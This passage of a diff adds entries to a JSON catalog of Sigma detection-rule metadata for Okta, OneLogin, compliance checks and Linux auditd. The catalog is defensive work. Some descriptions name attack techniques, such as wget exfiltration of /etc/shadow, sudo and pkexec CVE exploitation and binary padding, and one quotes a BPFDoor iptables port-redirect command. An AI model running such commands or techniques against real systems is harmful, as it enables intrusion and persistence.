Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an application is modified or deleted.", + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_application_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated", + "meta": { + "refs": [ + 
"https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2021/09/21", + "filename": "okta_mfa_reset_or_deactivated.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + 
"falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_policy_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an security threat is detected in Okta.", + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected", + "meta": { + "refs": [ + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags", + "creation_date": "2021/09/12", + "filename": "okta_security_threat_detected.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + 
"Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when unauthorized access to app occurs.", + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_unauthorized_access_to_app.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "User might of believe that they had access." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an user account is locked out.", + "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_user_account_locked_out.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an user assumed another user account.", + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User", + "meta": { + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + 
"attack.impact" + ], + "creation_date": "2021/10/12", + "filename": "onelogin_assumed_another_user.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "onelogin" + } + }, + { + "description": "Detects when an user account is locked or suspended.", + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked", + "meta": { + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/10/12", + "filename": "onelogin_user_account_locked.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "logsource.category": "No established category", + "logsource.product": "onelogin" + } + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "default_credentials_usage.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "qualys" + } + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
Ensure that an encrypted channels is used for all administrative account access.\n", + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "firewall_cleartext_protocols.yml", + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a \u2018Member is added to a Security Group\u2019.\nEvent ID 4729 indicates a \u2018Member is removed from a Security enabled-group\u2019 .\nEvent ID 4730 indicates a \u2018Security Group is deleted\u2019.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "group_modification_logging.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/19", + "filename": "host_without_firewall.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "qualys" + } + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", + "uuid": 
"7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "netflow_cleartext_protocols.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "workstation_was_locked.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects change of user environment. 
Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc", + "meta": { + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ], + "creation_date": "2019/05/12", + "filename": "lnx_auditd_alter_bash_profile.yml", + "author": "Peter Matkovski", + "level": "medium", + "falsepositive": [ + "Admin or User activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to record audio with arecord utility", + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture", + "meta": { + "refs": [ + "https://linux.die.net/man/1/arecord", + "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://attack.mitre.org/techniques/T1123/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2021/09/04", + "filename": "lnx_auditd_audio_capture.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect changes in auditd configuration files", + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host", + "meta": { + "refs": [ + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "Self Experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + 
], + "creation_date": "2019/10/25", + "filename": "lnx_auditd_auditing_config_change.yml", + "author": "Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2020/10/13", + "filename": "lnx_auditd_binary_padding.yml", + "author": "Igor Fits, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate script work" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": "BPFDoor Abnormal Process ID or Lock File Accessed", + "meta": { + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ], + "creation_date": "2022/08/10", + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "author": "Rafal Piasecki", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No 
established category", + "logsource.product": "linux" + } + }, + { + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect", + "meta": { + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/10", + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "author": "Rafal Piasecki", + "level": "medium", + "falsepositive": [ + "Legitimate ports redirect" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. 
That would allow adversary to escalate their privileges.", + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery", + "meta": { + "refs": [ + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ], + "creation_date": "2021/11/28", + "filename": "lnx_auditd_capabilities_discovery.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_change_file_time_attr.yml", + "author": "Igor Fits, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects removing immutable file attribute.", + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/09/24", + "filename": "lnx_auditd_clipboard_collection.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + 
"value": "Clipboard Collection of Image Data with Xclip Tool", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/10/01", + "filename": "lnx_auditd_clipboard_image_collection.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects command line parameter very often used with coin miners", + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param", + "meta": { + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/10/09", + "filename": "lnx_auditd_coinminer.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account", + "meta": { + "refs": [ + "MITRE Attack technique T1136; Create Account ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "creation_date": "2020/05/18", + "filename": "lnx_auditd_create_account.yml", + "author": "Marie Euler", + "level": "medium", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ], + "creation_date": "2021/02/01", + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": 
"CVE-2021-3156 Exploitation Attempt Bruteforcing", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ], + "creation_date": "2021/02/01", + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "CVE-2021-4034 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2022/01/27", + "filename": "lnx_auditd_cve_2021_4034.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_data_compressed.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2021/11/18", + "filename": "lnx_auditd_data_exfil_wget.yml", + "author": "Pawel Mazur", + "level": "medium", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2019/10/23", + "filename": 
